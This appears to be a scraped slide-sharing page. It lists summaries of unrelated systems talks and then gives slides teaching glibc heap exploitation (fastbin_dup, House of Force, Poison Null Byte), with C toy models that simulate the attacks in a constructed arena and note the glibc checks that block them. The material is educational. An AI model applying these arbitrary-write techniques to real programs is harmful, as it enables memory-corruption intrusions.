The document discusses the internals of the Windows heap and how it can be exploited for arbitrary memory overwrites. It covers the key data structures used in heap management like segments, free lists, lookaside tables, and virtually allocated chunks. The algorithms for allocation and freeing memory from the heap are explained in detail. Special techniques for reliable heap exploitation are presented for overcoming issues with service pack dependencies and unknown addresses.
This document discusses database backup and recovery. It defines backup as additional copies of data for restoration if the primary copy is lost or corrupted. There are several types of backups including full, incremental, differential, and mirror backups. Recovery brings the database back to a prior consistent state, using techniques like log files, check pointing, and immediate or deferred transaction updates. Factors like backup location, test restores, automation, and database design can influence recovery duration. Alternatives to traditional backup and recovery include standby databases, replication, and disk mirroring.
The document provides details about the Pentium II processor, including its 64-bit data bus, 32-bit address size supporting 4GB of addressable memory, and dual integer pipelines. It describes changes in Pentium II such as moving the level 2 cache closer to the microprocessor to reduce costs and improve efficiency. Finally, it outlines new instructions for fast system calls and restoring MMX state that improved performance.
MacOS memory allocator (libmalloc) Exploitation, by Angel Boy
The document discusses the memory allocator libmalloc used in MacOS. It details the data structures used to manage tiny chunks of memory less than 1008 bytes, including blocks, chunks, magazines, free lists, bitmaps and regions. The mechanism of allocating, freeing and caching tiny chunks is also described.
Windows 10 Nt Heap Exploitation (English version), by Angel Boy
The document discusses the Windows memory allocator and heap exploitation. It describes the core components and data structures of the NT heap, including the _HEAP structure, _HEAP_ENTRY chunks, BlocksIndex structure, and FreeLists. It also explains the differences between the backend and frontend allocators as well as how chunks of different sizes are managed.
The document discusses Linux file systems. It describes that Linux uses a hierarchical tree structure with everything treated as a file. It explains the basic components of a file system including the boot block, super block, inode list, and block list. It then covers different types of file systems for Linux like ext2, ext3, ext4, FAT32, NTFS, and network file systems like NFS and SMB. It also discusses absolute vs relative paths and mounting and unmounting filesystems using the mount and umount commands.
The document discusses the process from compiling source code to executing a program. It covers preprocessing, compilation, assembly, linking, and the ELF file format. Preprocessing handles macros and conditionals. Compilation translates to assembly code. Assembly generates machine code. Linking combines object files and resolves symbols statically or dynamically using libraries. The ELF file format organizes machine code and data into sections in the executable.
The Linux directory structure is organized with / as the root directory. Key directories include /bin and /sbin for essential system binaries, /boot for boot files, /dev for device files, /etc for configuration files, /home for user home directories, /lib for shared libraries, /media and /mnt for mounting removable media, /opt for optional application software, /proc for process information, /root for the root user's home, /tmp for temporary files, /usr for secondary hierarchy data and binaries, and /var for variable data.
This document discusses Intel's multi-core processor organization. It describes how a multi-core processor combines two or more processor cores onto a single silicon chip. It identifies key variables in multi-core organization as the number of cores, levels of cache memory, and amount of shared cache. It provides examples of Intel's Core i7, Core Duo, AMD Opteron, and ARM11 MP Core multi-core processors and highlights their core configurations and cache architectures.
Process' Virtual Address Space in GNU/Linux, by Varun Mahajan
The document discusses the virtual address space of a process in GNU/Linux. It explains that a process has both a user space and kernel space in virtual memory. The process' virtual address space contains text, data, and shared library segments. Functions like brk, sbrk, mmap, malloc, and free are used to allocate and free memory in the data segment to grow the process heap.
1) The document discusses different levels of programming languages including machine language, assembly language, and high-level languages. Assembly language uses symbolic instructions that directly correspond to machine language instructions.
2) It describes the components of the Intel 8086 processor including its 16-bit registers like the accumulator, base, count, and data registers as well as its segment, pointer, index, and status flag registers.
3) Binary numbers can be represented in signed magnitude, one's complement, or two's complement form. Two's complement is commonly used in modern computers as it allows for efficient addition and subtraction of binary numbers.
Linux Memory Management
1. Memory structure of the Linux OS.
2. How a program is loaded into memory.
3. Address translation.
4. Features for multithreading and multiprocessing.
You didn't see it's coming? "Dawn of hardened Windows Kernel", by Peter Hlavaty
For the past few years our team has been focusing on different operating systems, including the Microsoft Windows kernel. Honestly, our first pwn of the Windows kernel was not that challenging: a number of available targets with a friendly environment for a straightforward pwn, from user up to reliable kernel code execution.
However, step by step, security policies continue to evolve, and it becomes more troublesome to choose the ideal attack surface from various sandboxes. In addition, what steps to follow for digging up security holes is highly dependent upon the chosen target. In general, a few common strategies are available for researchers to choose from: e.g. choose an "unknown" one which hasn't been researched before; select a well-fuzzed or well-audited one; or research kernel module internals to find "hidden" attack surfaces which are not explicitly interconnected. In the first part of the talk we introduce our methodology of selecting, alongside the cost of tricks used to choose seemingly banned targets, illustrated by notable examples.
After getting hands on a potential bug available from the targeted sandbox, it is time for Microsoft Windows' hardening efforts to put the attacker into a corner. Strong mitigations are being introduced more frequently than ever, with a promising direction which cuts lots of attack surface off, and several exploitation techniques being killed. We will show the difficulties of developing universal exploitation techniques, and demonstrate the technical level needed depending on the code quality of the target. We will examine how different it becomes in the era of Redstone and following versions even with those techniques and a good vulnerability in hand. How it changed the attacker landscape and how it will (and will not) kill those techniques and applications. However, will it really change the game or not?
The document discusses the thread model of Java. It states that all Java class libraries are designed with multithreading in mind. Java uses threads to enable asynchronous behavior across the entire system. Once started, a thread can be suspended, resumed, or stopped. Threads are created by extending the Thread class or implementing the Runnable interface. Context switching allows switching between threads by yielding control voluntarily or through prioritization and preemption. Synchronization is needed when threads access shared resources using monitors implicit to each object. Threads communicate using notify() and wait() methods.
The document discusses C++ exploitation techniques including name mangling, virtual function tables, vtable hijacking, vectors, strings, and memory allocation/deallocation functions like new and delete. It provides details on how virtual function tables are used to implement polymorphism in C++ and how vtable hijacking can be used to exploit vulnerabilities by forcing a vtable and hijacking the virtual function pointer to call shellcode. It also explains how vectors and strings are implemented dynamically in memory and their memory layout.
This document discusses multiprogramming and time sharing in operating systems. It defines multiprogramming as allowing multiple programs to execute concurrently by assigning pending work to idle processors and I/O devices. Time sharing extends multiprogramming by rapidly switching between programs so that each program executes for a fixed time quantum, giving users the impression that the entire system is dedicated to their use. The key aspects covered are the concepts of processes, CPU scheduling, and how multiprogramming and time sharing improve resource utilization.
The Linux kernel tracks each process's memory mappings through data structures reachable from the process's task_struct. The mm_struct stored there holds the vm_area_struct objects that describe each mapping. When a process calls malloc() and the user-space allocator grows the heap with brk() or maps a new region with mmap(), the kernel updates the process's mm_struct and vm_area_structs to cover the new virtual range; physical pages are assigned lazily on first access. Similarly, when a process forks, the child inherits copies of the parent's mm_struct and vm_area_structs, giving it the same mappings while keeping the two processes' memory private (copy-on-write).
Memory organization
Memory Organization in Computer Architecture. A memory unit is the collection of storage units or devices together. The memory unit stores binary information in the form of bits. ... Volatile memory: this loses its data when power is switched off.
Windows 10 Nt Heap Exploitation (Chinese version), by Angel Boy
The document discusses Windows memory allocation and the NT heap. It describes the core data structures used, including the _HEAP, _HEAP_ENTRY chunks, and _HEAP_LIST_LOOKUP BlocksIndex. It explains how allocated, freed, and VirtualAlloc chunks are structured and managed in the Back-End, including using freelist chains and BlocksIndex to efficiently service allocation requests.
The document provides an overview of the Linux kernel architecture and processes. It discusses key kernel concepts like the monolithic kernel design, system calls, loadable modules, virtual memory, and preemptive multitasking. It also covers kernel functions, layers, and context switching between processes. The CPU scheduler, multi-threading, inter-process communication techniques, and tunable kernel parameters are summarized as well.
Globalwebtutors.com is an online tutoring platform that provides homework help, dissertation editing, assignment help, and question help. Users can send requirements to Support@globalwebtutors.com or connect via live chat. The document then discusses various aspects of memory management techniques used in operating systems like paging, segmentation, and virtual memory management. It describes processes like swapping, different address types, internal and external fragmentation, and more. More information is available at the provided link.
Linux uses memory management to partition memory between kernel and application spaces, organize memory using virtual addresses, and swap memory between primary and secondary storage. It divides memory using paging into equal-sized pages, creates virtual address spaces, and uses an MMU to translate between virtual and physical addresses. This allows processes to run independently with their own logical view of memory while the physical memory is shared.
COSCUP 2020 RISC-V 32 bit linux highmem porting, by Eric Lin
- The document discusses porting HIGHMEM support to 32-bit RISC-V Linux to allow the kernel to access physical memory above 896MB. It involves deciding the memory layout, creating a PKMAP region for temporary mappings, allocating FIXMAP slots for kmap_atomic(), and setting up a page table for the PKMAP region. However, maintaining HIGHMEM comes with performance costs and some upstream developers prefer to avoid it on new architectures if possible.
1. The document discusses various concepts of control flow in programming languages including sequencing, selection, iteration, recursion, and exceptions.
2. It covers different types of loops like for loops, while loops, and do-while loops. Various evaluation strategies are discussed including applicative order evaluation and normal order evaluation.
3. The key differences between iteration and recursion are explained. Recursion is more common in functional languages while iteration is used more often in imperative languages.
Linux Memory Management with CMA (Contiguous Memory Allocator), by Pankaj Suryawanshi
Fundamentals of Linux Memory Management and CMA (Contiguous Memory Allocator) In Linux.
Virtual Memory, Physical Memory, Swap Space, DMA, IOMMU, Paging, Segmentation, TLB, Hugepages, Ion google memory manager
This presentation is about timers in Linux based operating systems. It gives a brief idea about jiffies,system timer,real time clock,interrupts and how they are handled etc.
Slide 20. Top Chunk?
[Diagram] Before: Chunk Size (1000) | User Data (Top Chunk). After a small allocation is split off: Chunk Size (30) | User Data, followed by Chunk Size (970) | User Data (Top Chunk).
Sungkyunkwan University H.I.T
Slide 23. How2Heap Contents
git clone https://github.com/shellphish/how2heap
cd how2heap && make
./house_of_force
Slide 24. Heap Exploit Techniques
- Use After Free
- Double free bug
- Fastbin_dup
- House of force
- House of spirit
- House of lore
- Poison Null Byte
- etc.
Slide 32. Fastbin_dup
- free(a); free(b); free(a);
- int *c = malloc(8);
[Diagram] Legend: a free chunk is laid out as Size | Fd | Bk | Unused, an allocated chunk as Size | User Data. A lives at address 1000 and B at 2000.
Fastbin after the three frees: head = 1000 -> A (Fd = 2000) -> B (Fd = 1000) -> A (Fd = 2000) -> ...
Slide 33. Fastbin_dup
- free(a); free(b); free(a);
- int *c = malloc(8); // returns 1000
[Diagram] Fastbin after the malloc popped A: head = 2000 -> B (Fd = 1000) -> A (Fd = 2000) -> ...
Slides 34-35. Fastbin_dup
- free(a); free(b); free(a);
- int *c = malloc(8); // returns 1000
- *c = 0x12345678;
[Diagram] A and C are the same chunk at 1000, so the write through c lands in A's Fd. Before the write: head = 2000 -> B (Fd = 1000) -> A, C (Fd = 2000). After the write: head = 2000 -> B (Fd = 1000) -> A, C (Fd = 12345678).
Slide 36. Fastbin_dup
- free(a); free(b); free(a);
- int *c = malloc(8); // returns 1000
- *c = 0x12345678;
- malloc(8); // 2000
- malloc(8); // 1000
- malloc(8); // 12345678
[Diagram] head = 2000 -> B (Fd = 1000) -> A, C (Fd = 12345678): the three mallocs pop 2000, then 1000, then the attacker-chosen 12345678.
Slide 37. Fastbin_dup
- Fastbin_dup summary
- A is at address 1000 and C is at address 1000.
- A and C end up pointing at the same location.
- C holds the user's data while A holds free-list data (the Fd pointer).
- Requirements:
  a double free must occur (with another free in between, as in a, b, a)
  (the Size field at address 12345678 must be set to match the bin)
  (only applies to small, fastbin-sized chunks)
[Diagram] Legend: free chunk = Size | Fd | Bk | Unused; allocated chunk = Size | User Data.
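Added example (not code from the slides and not glibc source): a C toy model of one pre-tcache glibc fastbin that replays the sequence from slides 32-37, free(a); free(b); free(a); c = malloc(8); write through c; three more malloc(8), together with the two checks glibc makes on that path: free() rejects a chunk that is already the bin head ("double free or corruption (fasttop)"), and malloc() rejects a popped chunk whose size field does not belong to the bin ("malloc(): memory corruption (fast)"). The arena, the chunk offsets 0x1000/0x2000/0x3000 standing in for 1000, 2000 and 12345678, and the fake_size parameter are constructed for the example. On a current glibc the same sequence is intercepted earlier: since 2.26 small frees go to tcache first (with its own double-free detection from 2.29), and since 2.32 safe-linking mangles Fd, so the fake address has to be encoded as (address of the fd field >> 12) ^ target; how2heap keeps per-version variants for this reason.

```c
#include <stddef.h>
#include <string.h>

/*
 * Toy model of one glibc fastbin (added example: not glibc source and not
 * code from the slides).  A fastbin is a LIFO singly linked list threaded
 * through the fd field of freed chunks, and fd overlaps the first 8 bytes
 * of the chunk's user data, which is what fastbin_dup relies on.
 */
#define CHUNK_SIZE  0x20      /* request2size(8) on 64-bit: the bin malloc(8) uses */
#define ARENA_BYTES 0x4000    /* constructed heap for the example */

struct chunk {
    size_t prev_size;
    size_t size;              /* PREV_INUSE flag in bit 0 */
    struct chunk *fd;         /* same bytes as the first 8 bytes of user data */
};

static size_t arena[ARENA_BYTES / sizeof(size_t)];
static struct chunk *fastbin_head;   /* av->fastbinsY[fastbin_index(CHUNK_SIZE)] */
static const char *last_error;

static size_t chunksize(const struct chunk *p) { return p->size & ~(size_t)7; }
static struct chunk *mem2chunk(void *mem) { return (struct chunk *)((char *)mem - 2 * sizeof(size_t)); }
static void *chunk2mem(struct chunk *p) { return (char *)p + 2 * sizeof(size_t); }

/* free(): push onto the bin.  glibc compares only against the current head, so
   free(a); free(a) is caught while free(a); free(b); free(a) slips through. */
static int model_free(void *mem)
{
    struct chunk *p = mem2chunk(mem);
    if (p == fastbin_head) {
        last_error = "double free or corruption (fasttop)";
        return -1;
    }
    p->fd = fastbin_head;
    fastbin_head = p;
    return 0;
}

/* malloc(8): pop from the bin.  The popped chunk's size must belong to this bin;
   that is the slide's requirement that the Size word at 12345678 be prepared. */
static void *model_malloc8(void)
{
    struct chunk *victim = fastbin_head;
    if (victim == NULL)
        return NULL;                  /* real glibc would go on to other bins / top */
    if (chunksize(victim) != CHUNK_SIZE) {
        last_error = "malloc(): memory corruption (fast)";
        return NULL;
    }
    fastbin_head = victim->fd;
    return chunk2mem(victim);
}

const char *model_last_error(void) { return last_error; }

/* Replays the slide: free(a); free(b); free(a); c = malloc(8); *c = fake; then
   three more malloc(8).  fake_size is the value the attacker managed to place
   in the size field of the fake chunk (the slide's 12345678).
   Returns 1 if the last malloc hands out the fake chunk, 0 if the size check
   refused it, -1 if the sequence did not behave as the slide describes. */
int fastbin_dup_demo(size_t fake_size)
{
    memset(arena, 0, sizeof arena);
    fastbin_head = NULL;
    last_error = NULL;

    struct chunk *A    = (struct chunk *)((char *)arena + 0x1000);  /* "1000" */
    struct chunk *B    = (struct chunk *)((char *)arena + 0x2000);  /* "2000" */
    struct chunk *fake = (struct chunk *)((char *)arena + 0x3000);  /* "12345678" */
    A->size = B->size = CHUNK_SIZE | 1;
    fake->size = fake_size;

    void *a = chunk2mem(A), *b = chunk2mem(B);
    if (model_free(a) != 0) return -1;
    if (model_free(a) == 0) return -1;  /* a, a is rejected by the fasttop check */
    if (model_free(b) != 0) return -1;
    if (model_free(a) != 0) return -1;  /* a, b, a: bin is A -> B -> A -> B ... */

    size_t *c = model_malloc8();        /* pops A, so c aliases a */
    if ((void *)c != a) return -1;
    *c = (size_t)fake;                  /* user write through c lands in A->fd */

    void *x = model_malloc8();          /* B (2000) */
    void *y = model_malloc8();          /* A (1000) again, now with fd under our control */
    void *z = model_malloc8();          /* the fake chunk, or NULL if the size check fires */
    if (x != b || y != a) return -1;
    return z == chunk2mem(fake) ? 1 : 0;
}
```

fastbin_dup_demo(0x21) returns 1: the fake chunk's size word matches the 0x20 bin and the fourth malloc(8) returns it. fastbin_dup_demo(0x31) returns 0 because the popped chunk fails the size check, which is exactly why the slide lists a matching Size field at 12345678 as a requirement.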
Slide 38. House of force
- By manipulating the top chunk size, malloc() can be made to return any desired address.
- A heap buffer overflow vulnerability is a prerequisite, e.g.:
char *string = (char *)malloc(10);
strcpy(string, argv[1]);
- Gives a Write-What-Where primitive.
Slide 39. House of force
[Diagram] Chunk Size (1000) | User Data (Top Chunk)
Malloc size of at most 1000: the top chunk is split in two.
Malloc size above 1000: a new block of memory is requested from the OS.
Slide 40. House of force
Malloc(22);
[Diagram] Before: Chunk Size (1000) | User Data (Top Chunk). After: Chunk Size (30) | User Data, followed by Chunk Size (970) | User Data (Top Chunk).
Slide 41. House of force
Buffer Overflow
[Diagram] Chunk Size (30) | AAAAAAAAA AAAAAAAAA AAAAAAAAA AAAAAAAAA AAAAAAAAA (the copy runs past the end of the 30-byte chunk), followed by Chunk Size (970) | User Data (Top Chunk).
Slide 42. House of force
Buffer Overflow
[Diagram] Before: Chunk Size (30) | AAAAAAAAA AAAAAAAAA AAAAAAAAA AAAAAAAAA AAAAAAAAA, then Chunk Size (970) | User Data (Top Chunk). After: Chunk Size (30) | AAAAAAAAA AAAAAAAAA, then Chunk Size (41414141) | User Data (Top Chunk): the overflow has overwritten the top chunk's size field with 0x41414141.
Slide 43. House of force
Malloc(40000000);
[Diagram] Before: Chunk Size (30) | User Data, then Chunk Size (41414141) | User Data (Top Chunk). After: Chunk Size (40000000) | User Data, then Chunk Size (1414141) | User Data (Top Chunk).
Slide 44. House of force
Malloc(100);
[Diagram] Before: Chunk Size (40000000) | User Data, then Chunk Size (1414141) | User Data (Top Chunk). After: Chunk Size (100) | User Data, then Chunk Size (1414041) | User Data (Top Chunk).
Slide 45. House of force
[Diagram] Chunk Size (100) | User Data
- The chunk obtained this way sits 40000000 bytes past the original heap.
- By adjusting the 40000000, malloc() can be made to return any desired address.
※ Functions such as realloc take a size_t, so a "negative" size wraps around and lets the top chunk be moved in the other direction (towards lower addresses) as well.
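Added example (not code from the slides and not glibc source): a C model of the glibc use_top allocation path that House of Force abuses, replaying slides 38-45 with real pointers: malloc(10), an overflow that overwrites the top chunk's size, one huge request that moves the top chunk next to a target, and one ordinary request that lands on the target. The model can also apply the sanity check glibc added in 2.29 ("malloc(): corrupted top size": the top size must not exceed av->system_mem), which kills the technique on current systems. The arena, the target_obj global, and the 0xff overwrite standing in for the slide's strcpy() are constructed for the example; the evil request is computed the way how2heap's house_of_force does it (target minus current top minus 4 * SIZE_SZ), and because that subtraction is unsigned it also covers the slide's remark about "negative" sizes reaching addresses below the heap.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/*
 * Toy model of glibc's "carve from the top chunk" path (added example: not
 * glibc source and not code from the slides).  This is the only allocation
 * path House of Force needs: a request that no bin can serve is cut off the
 * front of the top chunk, and the top chunk's own size field decides whether
 * the request fits.
 */
#define SIZE_SZ            sizeof(size_t)
#define MALLOC_ALIGN_MASK  (2 * SIZE_SZ - 1)
#define MINSIZE            (4 * SIZE_SZ)
#define ARENA_BYTES        0x4000

struct chunk { size_t prev_size; size_t size; };   /* PREV_INUSE in bit 0 of size */

static _Alignas(16) size_t arena[ARENA_BYTES / sizeof(size_t)];   /* constructed heap */
static _Alignas(16) struct {
    size_t fake_header[2];   /* room for the chunk header the allocator writes before the target */
    size_t value[32];        /* a global outside the heap that the attacker wants malloc() to return */
} target_obj;
static struct chunk *top;    /* av->top */
static size_t system_mem;    /* av->system_mem */
static int check_top_size;   /* 1: apply the glibc 2.29+ "corrupted top size" check */
static const char *last_error;

static size_t request2size(size_t req)
{
    size_t s = (req + SIZE_SZ + MALLOC_ALIGN_MASK) & ~MALLOC_ALIGN_MASK;
    return s < MINSIZE ? MINSIZE : s;
}
static size_t chunksize(const struct chunk *p) { return p->size & ~(size_t)7; }
static void *chunk2mem(struct chunk *p) { return (char *)p + 2 * SIZE_SZ; }

void model_init(int glibc_2_29_checks)
{
    memset(arena, 0, sizeof arena);
    memset(&target_obj, 0, sizeof target_obj);
    top = (struct chunk *)arena;
    system_mem = sizeof arena;
    top->size = system_mem | 1;
    check_top_size = glibc_2_29_checks;
    last_error = NULL;
}

/* _int_malloc()'s use_top branch. */
void *model_malloc(size_t req)
{
    size_t nb = request2size(req);
    size_t size = chunksize(top);
    if (check_top_size && size > system_mem) {
        last_error = "malloc(): corrupted top size";   /* check added in glibc 2.29 */
        return NULL;
    }
    if (size < nb + MINSIZE) {
        last_error = "top too small; real glibc would call sysmalloc()";
        return NULL;
    }
    struct chunk *victim = top;
    top = (struct chunk *)((uintptr_t)victim + nb);    /* remainder = chunk_at_offset(victim, nb) */
    top->size = (size - nb) | 1;
    victim->size = nb | 1;
    return chunk2mem(victim);
}

const char *model_last_error(void) { return last_error; }
void *house_of_force_target(void) { return target_obj.value; }

/* The slide's sequence: malloc(10); overflow into the top chunk header; one huge
   malloc that moves top right in front of the target; one ordinary malloc that
   lands on it.  Returns the final malloc()'s result, NULL if the model refused. */
void *house_of_force_demo(int glibc_2_29_checks)
{
    model_init(glibc_2_29_checks);
    char *s = model_malloc(10);          /* 0x20-byte chunk; top->size now sits at s + 24 */
    if (s == NULL)
        return NULL;

    /* Stand-in for strcpy(string, argv[1]): 32 bytes into a 24-byte region reach
       top->size.  0xff bytes make it (size_t)-1 so that any request "fits"; the
       slide's 'A's would give 0x4141414141414141 instead. */
    memset(s, 0xff, 32);

    /* Distance from the current top to the chunk header 16 bytes before the target,
       minus the SIZE_SZ that request2size() adds back (how2heap's evil_size).  The
       arithmetic is unsigned, so a target below the heap simply wraps around: that
       is the slide's remark about negative sizes. */
    size_t evil = (uintptr_t)target_obj.value - (uintptr_t)top - 4 * SIZE_SZ;
    if (model_malloc(evil) == NULL)
        return NULL;                     /* top is now at target - 16 */

    return model_malloc(100);            /* returns target_obj.value itself */
}
```

house_of_force_demo(0) returns the address of target_obj.value: after the huge request the top chunk header sits in target_obj.fake_header, so the next ordinary malloc(100) hands out the target. house_of_force_demo(1) returns NULL with "malloc(): corrupted top size", because a top size of (size_t)-1 exceeds system_mem; that single comparison is what removed House of Force from glibc 2.29 onward.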
Slide 49. Poison Null Byte
[Diagram] Line 2: P = 0 (the PREV_INUSE bit is cleared by the null byte). Chunk headers shown: Prev | 101 (User Data), Prev | 101 (User Data), Prev | 101 (Fd, Bk); after the write, 100 | 100 (User Data); Line 3 / Line 4: Prev | 201 (Fd, Bk) (Merged).